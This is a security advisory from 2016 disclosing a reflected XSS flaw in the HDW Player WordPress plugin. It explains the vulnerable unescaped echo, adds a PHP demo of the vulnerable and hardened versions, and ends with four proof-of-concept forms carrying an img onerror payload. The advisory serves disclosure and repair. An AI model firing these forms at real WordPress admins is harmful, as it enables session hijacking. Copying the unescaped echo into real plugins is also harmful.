HDW Player Plugin [Reflected XSS]
Description
The problem is in the following code:
file: hdw-player-video-player-video-gallery/hdwplayer/__grid.php
line: 112
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
Same snippet exists in files:
hdw-player-video-player-video-gallery/playlist/__grid.php
hdw-player-video-player-video-gallery/gallery/__grid.php
hdw-player-video-player-video-gallery/videos/__grid.php
The value is echoed into an HTML attribute without any escaping (esc_attr() or equivalent). On every request WordPress rebuilds $_REQUEST itself (wp_magic_quotes() in wp-includes/load.php) as array_merge($_GET, $_POST), so $_GET is applied first and $_POST after it, meaning a POST parameter overrides a GET parameter of the same name. An attacker can therefore submit a POST request to the plugin's admin page, selected by the "page" GET parameter in the URL, while supplying a different "page" value in the POST body; admin.php still routes on the GET value, but the plugin echoes the attacker-controlled POST value. Because the payload is delivered by a cross-site form post, the victim must be logged into wp-admin with access to the plugin's menu pages when they submit it.
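The following is an added example, not the plugin's own code, that reproduces the $_REQUEST precedence described above and places the vulnerable echo beside a hardened version. It is meant to be run from the PHP CLI with no WordPress install: $_GET and $_POST are filled in by hand with constructed input (the same payload as the PoC), and a minimal htmlspecialchars-based stand-in for WordPress's esc_attr() is defined only when the real one is absent.

```php
<?php
// Added example; not code from the HDW Player plugin.
// Constructed request data: what admin.php?page=hdwplayer sees when the PoC form is submitted.
$_GET  = array('page' => 'hdwplayer');
$_POST = array('page' => '"><img src=b onerror=alert(1) /><input type="hidden" ');

// WordPress rebuilds $_REQUEST like this in wp_magic_quotes(); the later array wins,
// so the POST value overrides the GET value of the same name.
$_REQUEST = array_merge($_GET, $_POST);

// Vulnerable pattern from __grid.php: the value is concatenated raw into an attribute,
// so a double quote in the input closes value="..." and the rest is parsed as markup.
function grid_page_input_vulnerable() {
    return '<input type="hidden" name="page" value="' . $_REQUEST['page'] . '" />';
}

// Stand-in for WordPress's esc_attr() so the example runs outside WordPress.
// Real esc_attr() additionally validates UTF-8 and avoids double-encoding; for this
// input the result is the same: quotes, < > and & are HTML-encoded.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    }
}

// Hardened form: the encoded value can no longer terminate the attribute.
function grid_page_input_fixed() {
    return '<input type="hidden" name="page" value="' . esc_attr($_REQUEST['page']) . '" />';
}

echo "Vulnerable: " . grid_page_input_vulnerable() . "\n";
echo "Fixed:      " . grid_page_input_fixed() . "\n";
```

Running it prints the vulnerable line with a live `<img ... onerror=...>` element and the fixed line with `&quot;&gt;&lt;img ...` inside the attribute. Since this hidden field only ever needs to carry the plugin's own menu slug, a stricter fix is to validate the value against the known slugs (hdwplayer, playlist, gallery, videos) or read it from $_GET only, rather than echoing whatever arrived in $_REQUEST.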
PoC
<form action="http://sbwp1.dev/wp-admin/admin.php?page=hdwplayer" method="post">
<input type="hidden" name="page" value='"><img src=b onerror=alert(1) /><input type="hidden" ' >
<button type="submit">Go To Video List</button>
</form>
<form action="http://sbwp1.dev/wp-admin/admin.php?page=playlist" method="post">
<input type="hidden" name="page" value='"><img src=b onerror=alert(1) /><input type="hidden" ' >
<button type="submit">Go To Playlist</button>
</form>
<form action="http://sbwp1.dev/wp-admin/admin.php?page=gallery" method="post">
<input type="hidden" name="page" value='"><img src=b onerror=alert(1) /><input type="hidden" ' >
<button type="submit">Go To Gallery</button>
</form>
<form action="http://sbwp1.dev/wp-admin/admin.php?page=videos" method="post">
<input type="hidden" name="page" value='"><img src=b onerror=alert(1) /><input type="hidden" ' >
<button type="submit">Go To Videos</button>
</form>
INFO
- 24 April 2016
- Pan Vag
- HDW Player Plugin
- WordPress 4.5
- DWF-2016-87024